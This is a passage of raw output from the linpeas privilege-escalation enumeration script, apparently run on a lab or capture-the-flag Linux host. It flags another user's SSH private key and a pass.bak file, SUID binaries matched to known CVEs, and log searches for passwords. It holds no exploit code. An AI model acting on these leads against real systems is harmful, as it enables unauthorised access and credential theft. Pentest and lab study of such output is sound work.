Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
--> /etc/hosts.allow file found, read the rules:
Looking inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No
[+] Looking for Cloud credentials (AWS, Azure, GC)
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found
[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
cat: /etc/krb5.conf: No such file or directory
tickets kerberos Not Found
klist Not Found
[+] Looking for Kibana yaml
kibana.yml Not Found
[+] Looking for Knock configuration
Knock.config Not Found
[+] Looking for logstash files
Not Found
[+] Looking for elasticsearch files
Not Found
[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found
[+] Looking for AD cached hashes
-rw------- 1 root root 430080 Apr 19 2018 /var/lib/samba/private/secrets.tdb
[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /var/run/screen/S-jan.
[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found
[+] Looking for Couchdb directory
[+] Looking for redis.conf
[+] Looking for dovecot files
dovecot credentials Not Found
[+] Looking for mosquitto.conf
[+] Looking for neo4j auth file
[+] Looking Cloud-Init conf file
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/bin/su
/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
/bin/ping6
/bin/umount ---> BSD/Linux(08-1996)
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/snapd/snap-confine
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/expiry
/usr/bin/wall
/usr/bin/screen ---> GNU_Screen_4.5.0
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/mlocate
[+] Writable folders configured in /etc/ld.so.conf.d/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
/usr/local/lib
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu/mesa
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
[+] Users with capabilities
/etc/security/capability.conf Not Found
[+] .sh files in path
/usr/bin/gettext.sh
[+] Unexpected folders in root
/samba
[+] Files (scripts) in /etc/profile.d/
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 580 Nov 30 2017 apps-bin-path.sh
-rw-r--r-- 1 root root 663 May 18 2016 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1557 Apr 14 2016 Z97-byobu.sh
[+] Hashes inside passwd file? ........... No
[+] Hashes inside group file? ............ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read root folder? .............. No
[+] Looking for root files in home dirs (limit 20)
/home
/home/jan
/home/jan/.lesshst
/home/kay/.viminfo
/home/kay/.lesshst
[+] Looking for others files in folders owned by me
[+] Readable files belonging to root and readable by me but not world readable
[+] Modified interesting files in the last 5mins
/etc/samba/dhcp.conf
/tmp/linepeas.txt
/tmp/linpeas.sh
/var/log/syslog
/var/log/auth.log
/var/log/kern.log
[+] Writable log files (logrotten)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
[+] Files inside /home/jan (limit 20)
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak
[+] Looking for installed mail applications
[+] Mails (limit 50)
[+] Backup files?
-rw-r--r-- 1 root root 128 Apr 17 2018 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 610 Apr 17 2018 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17 2018 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 9542 Apr 19 2018 /etc/samba/smb.conf.bak
-rwxr-xr-x 1 root root 10504 Mar 14 2016 /usr/bin/tdbbackup.tdbtools
[+] Looking for tables inside readable .db/.sqlite files (limit 100)
-> Extracting tables from /var/lib/nssdb/cert9.db (limit 20)
-> Extracting tables from /var/lib/nssdb/key4.db (limit 20)
[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2018 .
drwxr-xr-x 14 root root 4.0K Apr 18 2018 ..
drwxr-xr-x 3 root root 4.0K Apr 23 2018 html
/var/www/html:
total 16K
drwxr-xr-x 3 root root 4.0K Apr 23 2018 .
drwxr-xr-x 3 root root 4.0K Apr 18 2018 ..
[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
-rwxr-xr-x 1 root root 484 Dec 9 2016 /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 3161 Apr 14 2016 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug 1 2017 /etc/.pwd.lock
-rw-r--r-- 1 root root 1391 Apr 17 2018 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 root root 0 Apr 30 02:35 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 1319 Apr 17 2018 /var/lib/apparmor/profiles/.apparmor.md5sums
-rw-r--r-- 1 root root 155 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1374 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1304 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9092 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1324 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3529 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
-rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 402 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 316 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 315 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 340 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 146 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 3342 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 54037 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 22 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.21135.d
-rw-r--r-- 1 root root 3972 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 2839 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 3239 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 1193 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.bin2c.cmd
-rw-r--r-- 1 root root 4268 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2391 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 3253 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 153 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 2719 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 2481 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.parse.tab.o.cmd
-rw-r--r-- 1 root root 3347 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.lex.lex.o.cmd
-rw-r--r-- 1 root root 3387 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4495 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 2380 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 3485 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 104 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 4622 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 4451 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 5191 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 2537 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 546 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.h.cmd
-rw-r--r-- 1 root root 129 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 2289 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 5133 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 3755 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 110 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 4917 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 3568 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 190243 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config
-rw-r--r-- 1 root root 190367 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config.old
-rw-r--r-- 1 root root 820 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 14210 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 155 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1379 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1309 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9148 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1329 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3601 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 70)
-rw-rw-r-- 1 jan jan 80652 Apr 30 04:24 /tmp/linepeas.txt
-rwxr-xr-x 1 jan jan 213352 Apr 30 04:20 /tmp/linpeas.sh
-rw-r--r-- 1 root root 14659 Apr 23 2018 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 1458 Apr 18 2018 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 764 Apr 17 2018 /var/backups/apt.extended_states.2.gz
[+] Interesting writable files owned by me or writable by everyone (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/dev/shm/linpeas.txt
/run/lock
/run/screen/S-jan
/run/user/1001
/run/user/1001/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linepeas.txt
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by\x2duuid-db3bdca8\x2d5517\x2d4600\x2db896\x2de8479e05e44a.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/[email protected]/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1001.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/tomcat.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/tasks
/var/spool/samba
/var/tmp
[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group jan:
/dev/mqueue/linpeas.txt
/dev/shm/linpeas.txt
/tmp/linepeas.txt
[+] Searching passwords in config PHP files
[+] Finding IPs inside logs (limit 70)
80 /var/log/dpkg.log:1.16.04.1
40 /var/log/dpkg.log:1.16.04.3
25 /var/log/dpkg.log:1.16.04.2
24 /var/log/dpkg.log:1.16.04.4
21 /var/log/dpkg.log:2.16.04.1
20 /var/log/dpkg.log:3.16.04.1
15 /var/log/dpkg.log:3.16.04.3
14 /var/log/wtmp:192.168.56.102
10 /var/log/dpkg.log:6.16.04.1
10 /var/log/apt/history.log:1.16.04.1
9 /var/log/dpkg.log:2.29.4.2
9 /var/log/dpkg.log:2.16.04.2
6 /var/log/apt/history.log:1.16.04.3
4 /var/log/wtmp:192.168.56.101
4 /var/log/installer/status:1.2.3.3
3 /var/log/apt/history.log:2.16.04.1
3 /var/log/apt/history.log:1.16.04.4
3 /var/log/apt/history.log:1.16.04.2
2 /var/log/apt/history.log:3.16.04.1
1 /var/log/wtmp:10.9.35.106
1 /var/log/lastlog:192.168.56.102
1 /var/log/lastlog:10.9.35.106
1 /var/log/installer/status:2.21.63.3
1 /var/log/apt/history.log:6.16.04.1
1 /var/log/apt/history.log:3.16.04.3
1 /var/log/apt/history.log:2.29.4.2
1 /var/log/apt/history.log:2.16.04.2
[+] Finding passwords inside logs (limit 70)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.39) ...
/var/log/bootstrap.log:Setting up passwd (1:4.2-3.1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) over (3.5.39) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.2-3.1ubuntu5) ...
/var/log/dpkg.log:2017-08-01 11:16:21 configure base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 install base-passwd:amd64 <none> 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 upgrade base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:28 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:31 configure base-passwd:amd64 3.5.39 <none>
/var/log/dpkg.log:2017-08-01 11:16:31 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:37 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
/var/log/dpkg.log:2017-08-01 11:16:37 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
